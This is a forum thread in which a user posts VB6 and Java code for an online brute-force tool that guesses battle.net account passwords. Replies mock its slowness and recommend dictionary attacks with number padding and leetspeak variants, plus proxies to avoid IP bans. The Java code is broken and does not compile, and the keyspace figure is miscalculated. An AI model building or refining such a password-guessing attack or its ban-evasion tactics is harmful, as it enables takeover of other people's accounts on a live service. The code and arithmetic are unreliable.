[VB6] Bruteforce Method

[Joe]

I couldn't find any on the internet, so I had to write my own. The story, a friend of mine somehow got his items jacked, and I'm getting them back (d2, I mean). This is meant for a battle.net password (hence length = 12), but you can go ahead and make it whatever length you want. I wrote this in VB, because I'd have an easier time debugging it, but I'm porting it to java, so stay tuned.

Code Select Expand

Public Function BruteForce(L As Long) As String
    Const Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" 'Len(Alphabet) = 62
    Dim LeftOver As Long, I As Byte, Ret(1 To 12) As String, Position As Byte
    LeftOver = L
    I = 0
    While LeftOver > 0
        Let Position = (LeftOver Mod 62) + 1
        Ret(12 - I) = Mid(Alphabet, Position, 1)
        LeftOver = LeftOver - Position
        I = I + 1
    Wend
    BruteForce = Join(Ret, "")
End Function

EDIT -
Usage:
Bruteforce(1) = 'A'
Bruteforce(2) = 'B'
..
Bruteforce(26) = 'Z'
Bruteforce(27) = 'a'
..
Bruteforce(63) = 'AA'

and so forth.

[Sidoh]

I think you'd have more luck reading out of a dicitonary file.

[Ergot]

Psst... Password = "‰š§•¤»,,?±†Æ¶" ;/

[Joe]

fook u.

[Newby]

I think you'd have more luck reading out of a dicitonary file.

Yes, yes he would.

[Joe]

Theres what I've gotten so far. I corrected about 20 errors, compiled again. It spit out 20 new errors. I fixed them all, compiled again, and it spit out another 20 errors. *sigh*

Code Select Expand

/*
  Basic Battle.net Bruteforcer
  Written by Joe[x86]
*/


// Imports
import java.io.*;                // Used for getting text from the console
import java.net.Socket;          // Used to connect to battle.net
import java.io.InputStream;      // Used to recieve data from battle.net
import java.io.DataOutputStream; // Used to send data to battle.net
import java.io.IOException;      // Used to catch errors. Bah.


public class main {
public static void main(String args[]) {
System.out.println("Battle.net bruteforcer by Joe[x86] loaded.");
String server = getServer();
String username = getUsername();
int curpass = 0; boolean found = false;
while(!found) {
System.out.println("Attempting to log on to battle.net using password " + makepass(curpass) + ".");
if(bruteforce(server, username, makepass(curpass))) {
System.out.println("Password: " + makepass(curpass) + ".");
found = true;
} else {
System.out.println("Invalid password.");
curpass++;
}
}
}


public static String getServer() {
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
System.out.print("Server: ");
    try{ return br.readLine(); }catch(IOException e){ }
}


public static String getUsername() {
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
System.out.print("Username: ");
try{ return br.readLine(); }catch(IOException e){ }
}


public static String makepass(int l) {
String alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"; //Alphabet.length() = 62
    int leftover; int I; char ret[] = new char[12]; int position;
    leftover = l;
    I = 0;
    while(leftover > 0) {
        position = (leftover % 62) + 1;
        ret[12 - I] = alphabet.charAt(position);
        leftover = leftover - position;
        I++;
    }
    return ret.toString();
  }


public static boolean bruteforce(String server, String username, String password) {
boolean ret = false;
System.out.println("[BNET] Connected to " + server + ":6112");
try{ Socket sckBnet = new Socket(server, 6112); } catch(IOException e) { }
System.out.println("[BNET] Connected to " + server + ":6112");
try{ DataOutputStream output = new DataOutputStream(sckBnet.getOutputStream()); } catch(IOException e) { }
    try{ InputStream input = sckBnet.getInputStream(); } catch(IOException e) { }
System.out.println("[BNET] Created input and output streams on sckBnet.");
System.out.println("[BNET] Attempting to log in..");

    try {
    output.writeBytes("c");
      output.writeBytes(username);
      output.writeBytes("\n\t");
      output.writeBytes(password);
      output.writeBytes("\n\t");
      output.flush();
    } catch(IOException e) { }
   
    try{ input.read(); input.skip(input.available()); input.read(); input.skip(input.available()); } catch(IOException e) { }
    try{ byte status = input.read(); } catch(IOException e) { }
    switch(status) {
    case 0x32: ret = true; break;   // "2"
    case 0x4C: ret = false; break;  // "L"
    }
    try {
    output.close();
      input.close();
      sckBnet.close();
    } catch(IOException e) { }
    return ret;
}
}

[iago]

Do you realize how long that would take?  Your alphabet is 62 characters, and your string length is 12.  12⁶² =~ 8.11x10⁶⁶.  That's an 8 with 66 0's after it.  Let's say it takes 1/1,000,000,000,000 of a second (1/trillianth of a second, clearly unrealistically fast) to check a single value.  To check 8x10⁶⁶ values, that would take:
8x10⁵⁴ seconds
2x10⁴⁷ years

That's right, it would take about 250,000,000,000,000,000,000,000,000,000,000,000,000,000,000 years to guess every combination.  I don't think your friend should bother waiting that long to get his items back, since the universe probably won't be alive that long. 

As was said, you'd have more luck with a dictionary file.  I have a 125-mb dictionary that has every word in every language.  If you take those, append/prepend numbers, replace i and o and e with 1 and 0 and 3 in every combination, you'll have a pretty complete set.  It would still probably takes months to go through all that, but at least the Universe will still be around. :)

[Berzerker]

Do you realize how long that would take?  Your alphabet is 62 characters, and your string length is 12.  12⁶² =~ 8.11x10⁶⁶.  That's an 8 with 66 0's after it.  Let's say it takes 1/1,000,000,000,000 of a second (1/trillianth of a second, clearly unrealistically fast) to check a single value.  To check 8x10⁶⁶ values, that would take:
8x10⁵⁴ seconds
2x10⁴⁷ years

That's right, it would take about 250,000,000,000,000,000,000,000,000,000,000,000,000,000,000 years to guess every combination.  I don't think your friend should bother waiting that long to get his items back, since the universe probably won't be alive that long. 

As was said, you'd have more luck with a dictionary file.  I have a 125-mb dictionary that has every word in every language.  If you take those, append/prepend numbers, replace i and o and e with 1 and 0 and 3 in every combination, you'll have a pretty complete set.  It would still probably takes months to go through all that, but at least the Universe will still be around. :)

Jesus, and I thought downloading on 56k was slow...

[MyndFyre]

<3 iago for injecting some reality.

Joe, your method might crack my password (which is text-only but I guarantee not in any dictionary), but you'd need.... oh, something over 16 billion tries before you got it (I'm not telling you the actual number).  If you used specifically your method (not taking out the numbers), it'd take 39 billion tries.  And that's on a rather short and simple password!

Assuming you didn't have slow-ass dialup, at a reasonable DSL connection speed to Bnet of 1 second to connect and disconnect, it would take you 1249 years (with your method; taking out the numbers cuts it to a much more manageable 518 years).

GLhf.

[Quik]

x86] link=topic=2444.msg23032#msg23032 date=1124896714]
<3 iago for injecting some reality.

Joe, your method might crack my password (which is text-only but I guarantee not in any dictionary), but you'd need.... oh, something over 16 billion tries before you got it (I'm not telling you the actual number).  If you used specifically your method (not taking out the numbers), it'd take 39 billion tries.  And that's on a rather short and simple password!

Assuming you didn't have slow-ass dialup, at a reasonable DSL connection speed to Bnet of 1 second to connect and disconnect, it would take you 1249 years (with your method; taking out the numbers cuts it to a much more manageable 518 years).

GLhf.

And an aweful lot of proxies, because DSL would get IP-Banned. However, I believe iago developed some plugin for interfacing with dictionary.com, a definition plugin? That could be used for bruteforcing, of course it wouldn't be much better than this. There are programs that already do it much better ;).

[iago]

Mine can look up words once you know them, which doesn't help much

[Quik]

Still, the opportunity is there, however it doesn't make sense to accomplish that way.

[iago]

How, exactly? You'd have to try every combination, then use my plugin to find out if it is an actual word.  So it wouldn't speed it up any, even possibly, because we're still checking every combination. 

[Quik]

By editing your plugin, and using the ability to interface with dictionary.com or a similar online script.

[Newby]

OR just using a dictionary list. :P